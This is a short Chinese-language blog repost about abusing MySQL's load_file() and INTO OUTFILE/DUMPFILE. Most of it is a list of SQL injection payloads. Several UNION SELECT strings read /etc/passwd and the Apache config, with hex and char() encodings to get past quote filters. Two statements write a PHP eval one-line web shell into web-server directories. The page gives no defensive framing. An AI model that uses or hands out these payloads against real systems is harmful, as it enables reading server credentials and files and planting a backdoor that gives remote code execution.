Mysql 读与写函数利用学习

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Mysql 读与写函数利用学习相关的知识,希望对你有一定的参考价值。

 
语句简单记忆:  
 
        select load_file();
        select ‘一句话‘ into outfile ‘网站路径‘ ;
 
1、Mysql 读与写函数
 
(1) 读取函数 
     
        load_file()
 
(2) 写入函数
       
        into outfile ‘‘
        into dumpfile ‘‘
 
2、mysql读函数使用
 
(1)读配置文件语句
       
        select load_file(‘/etc/httpd/conf/httpd.conf‘)
        select load_file(‘/etc/passwd‘)       
 
(2)注入点读配置文件语句
      
        and 1=2 union select 1,load_file(‘/etc/httpd/conf/httpd.conf‘),3,4,5,6 -- -
        and 1=2 union select 1,load_file(‘/etc/passwd‘),3,4,5,6 -- -
 
(3)单引号绕过配置文件读取
       
        and 1=2 union select 1,load_file(‘/etc/passwd‘),3,4,5,6 -- -
        and 1=2 union select 1,load_file(0x2F6574632F706173737764),3,4,5,6 -- -    0x2F6574632F706173737764为"/etc/passwd"十六进制hex转换结果;
        and 1=2 union select 1,load_file(char(47 101 116 99 47 112 97 115 115 119 100 )),3,4,5,6 -- -    char(47 101 116 99 47 112 97 115 115 119 100 )为“、etc/passwd”的ASCII转码;
 
       注:当浏览器返回数据时,有可能乱码问题,此时可以使用hex()函数将字符串转换为“十六进制” 数据,格式如下。
       and 1=2 union select 1,hex(load_file(char(47 101 116 99 47 112 97 115 115 119 100))) ,3,4,5,6 -- -
 
3、Mysql写入函数使用
 
(1)写入一句话语句
       
         select ‘一句话‘  into outfile ‘/opt/lampp/htdocs/1.php
         select ‘一句话‘  into dumpfile ‘/var/www/html/1.php‘
 
(2)注入点写入一句话语句
     
        select  ‘<?php @eval($_POST[123]);?>‘  into outfile ‘/opt/lampp/htdocs/1.php‘
        select  ‘<?php @eval($_POST[123]);?>‘  into dumpfile ‘/var/www/html/1.php‘
 

以上是关于Mysql 读与写函数利用学习的主要内容,如果未能解决你的问题,请参考以下文章

这可能是最全的总结了,详解 20 个 pandas 读与写函数

NOPI 读与写

WPF程序中App.Config文件的读与写

MongoDB数据库文件的读与写

MongoDB数据库文件的读与写

第三周-第06章节-Python3.5-文件读与写详解